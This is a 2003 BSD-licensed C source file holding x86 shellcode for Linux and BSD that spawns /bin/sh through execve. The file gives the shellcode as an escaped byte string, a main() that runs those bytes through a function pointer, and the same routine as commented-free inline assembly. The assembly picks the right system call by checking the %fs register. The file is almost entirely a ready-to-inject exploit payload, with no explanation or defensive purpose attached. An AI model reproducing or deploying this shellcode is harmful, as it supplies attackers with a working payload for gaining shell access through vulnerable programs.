/*
 * execve /bin/sh
 *
 * Linux and *bsd.
 *
 *  Copyright (c) 2003 Alberto Ornaghi <alor@antifork.org>
 *
 *  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 */

char multishell[] =  "\xeb\x24\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x89\x43\x0c\x8d\x53"
                     "\x0c\x8d\x4b\x08\x8c\xe0\x21\xc0\x74\x04\xb0\x3b\xeb\x02\xb0\x0b"
                     "\x52\x51\x53\x53\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";


int main(int argc, char **argv) {

   void (*f)(void) = (void (*)(void))multishell;

   f();
   
}


void shell_multi(void) 
{

__asm__(
      "        jmp string_addr                     \n"
      " after_jmp:                                 \n"
      "        pop   %ebx                          \n"
      "        xorl  %eax, %eax                    \n"
      "        movl  %ebx, 0x8(%ebx)               \n"
      "        movb  %al, 0x7(%ebx)                \n"
      "        movl  %eax, 0xc(%ebx)               \n"
      "        lea   0xc(%ebx), %edx               \n"
      "        lea   0x8(%ebx), %ecx               \n"
      "        movl  %fs, %eax                     \n"
      "        and   %eax, %eax                    \n"
      "        je    linux                         \n"
      "        movb  $0x3b, %al                    \n"
      "        jmp   bsd                           \n"
      " linux:                                     \n"
      "        movb  $0xb, %al                     \n"
      " bsd:                                       \n"
      "        push  %edx                          \n"
      "        push  %ecx                          \n"
      "        push  %ebx                          \n"
      "        push  %ebx                          \n"
      "        int   $0x80                         \n"
      " string_addr:                               \n"
      "        call after_jmp                      \n"
      "  .string \"/bin/sh\"                       \n"
      );

}